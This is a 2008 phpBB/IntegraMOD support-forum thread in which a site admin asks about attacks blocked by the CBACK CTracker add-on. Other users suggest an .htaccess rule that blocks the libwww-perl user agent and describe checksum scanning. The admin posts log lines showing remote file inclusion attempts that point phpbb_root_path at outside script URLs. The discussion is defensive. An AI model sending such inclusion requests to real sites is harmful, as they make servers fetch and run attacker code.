IntegraMOD

Home of phpBB Integrated Modifications
https://www.integramod.com/forum/

CBACK Attacks

https://www.integramod.com/forum/viewtopic.php?f=18&t=4634

Page 1 of 1

CBACK Attacks

PostPosted: Tue Feb 05, 2008 4:01 pm
Author: BrianC
Your phpBB Version: 2.0.
phpBB Type: Standard phpBB
MODs: No
Your knowledge: Beginner
Board URL: [url]http://[/url]

PHP Version:
MySQL Version:


What was done before the problem appeared?



What was done to try to solve the problem?




De.scription and Message

Hi,

I installed a new install of the latest integramod 141 after being hacked badly a few times. CBACK indicates that it has blocked 125 attacks in just a couple of days. What are the attacks that are likely being blocked. Perhaps automated scans or maybe someone attacking the site again.

Any ideas?

Thanks,
Brian

Re: CBACK Attacks

PostPosted: Tue Feb 05, 2008 4:20 pm
Author: Helter
go to acp/CTracker/Logfile Manager/

Re: CBACK Attacks

PostPosted: Tue Feb 05, 2008 5:41 pm
Author: CaNNon
Perhaps automated scans

Those show up in phpbb security as ddos attacks

someone attacking the site again.

Yea attacking or trying to get spam in.

1 htaccess rule should cut that a lot. look at what is happing with this user agent libwww-perl if you would like to block add this to your .htaccess file.

Code: Select all
RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]

PostPosted: Tue Feb 05, 2008 10:37 pm
Author: spaniel
when u do a filescan in Ctracker and it tells you:

Code in the file is possibly executable from beyond phpBB


does that mean those files are unsafe and how can you stop them being executable from beyond phpBB?

And of my admin_security.php file, it said:

An undefined case occurred during scanning


should i be worried?


thanks.

Re: CBACK Attacks

PostPosted: Wed Feb 06, 2008 12:49 am
Author: CaNNon
No worries the first one you would use like to check if updates have made your forum more secure. Not all files can be coded "not to be possibly executable from beyond phpBB" in cases you need to do this.

The second one just don't worry about I think its more the scan/scan order, that the file.

[tab]Now the other included scanner is much better... as you can create check sums.
So after you work on your site make fresh check sums and if you think you may have had a guest, you can verify if there have been any changes to the code by the check sum. Also it shows you what file you need to go check!

A nice little tool and I have much faith in it.

PostPosted: Wed Feb 06, 2008 1:09 am
Author: spaniel
That sounds ingenius! Wow! It even tells u which file to check.

I'll be doing that from now on - thanks once again CaNNon <img>

Re: CBACK Attacks

PostPosted: Wed Feb 06, 2008 8:49 am
Author: CaNNon
No Problem. <img>

Re: CBACK Attacks

PostPosted: Wed Feb 06, 2008 5:54 pm
Author: BrianC
Thanks for the help!!
This is some of the info in my logfile and I have added the info indicated to my .htaccess
I added it to the htaccess in my root folder because that is where I forum is located.
Does that sound right.
<img>
6 Feb 2008 05:02 pm /group/portal.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt?? libwww-perl/5.808 65.98.55.154
2 06 Feb 2008 03:53 pm /group/portal.php?page=7&lofi=1//includes/functions_portal.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? libwww-perl/5.803 89.97.0.11
3 06 Feb 2008 03:16 pm /group/portal.php?phpbb_root_path=http://www.arabx1st.xpgplus.com.br/cmd.txt? libwww-perl/5.808 74.53.114.5
4 06 Feb 2008 03:13 pm /group/portal.php?phpbb_root_path=http://www.arabx1st.xpgplus.com.br/cmd.txt?? libwww-perl/5.808 74.53.114.5
5 06 Feb 2008 02:52 pm /group/portal.php?phpbb_root_path=http://test.iearn.uz/test.iearn.uz/help.txt???? libwww-perl/5.69 80.128.102.224
6 06 Feb 2008 02:40 pm /group/portal.php?phpbb_root_path=http://test.iearn.uz/test.iearn.uz/help.txt???? libwww-perl/5.803 213.83.63.218
7 06 Feb 2008 02:40 pm /group/portal.php?phpbb_root_path=http://test.iearn.uz/test.iearn.uz/help.txt??? libwww-perl/5.803 62.75.202.173
8 06 Feb 2008 01:44 pm /group/portal.php?page=7&lofi=1//includes/functions_portal.php?phpbb_root_path=http://217.126.22.22/.../myss.txt?? libwww-perl/5.805 64.81.203.10
9 06 Feb 2008 01:41 pm /group/portal.php?page=7&lofi=1//includes/functions_portal.php?phpbb_root_path=http://217.126.22.22/.../myss.txt?? libwww-perl/5.79 66.246.220.39
10 06 Feb 2008 01:32 pm /group/portal.php?page=7&lofi=1//includes/functions_portal.php?phpbb_root_path=http://66.153.86.221/www??????????????????????????????????? libwww-perl/5.805 75.0.18.81
11 06 Feb 2008 01:21 pm /group/portal.php?phpbb_root_path=http://217.126.22.22/.../myss.txt?? libwww-perl/5.805 64.81.203.10

Re: CBACK Attacks

PostPosted: Wed Feb 06, 2008 8:02 pm
Author: BrianC
Who is in non compliance Spaniel?

I installed the latest integramod and neither added or removed anything accept some header images.

Re: CBACK Attacks

PostPosted: Wed Feb 06, 2008 10:48 pm
Author: CaNNon
Yea the worst I've had is 600 hits from libwww-perl in one night Brian. I have yet to See it do anything but attack. Best to save the resources and just ban it. <img>
All times are UTC - 8 hours [ DST ]
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Group
https://www.phpbb.com/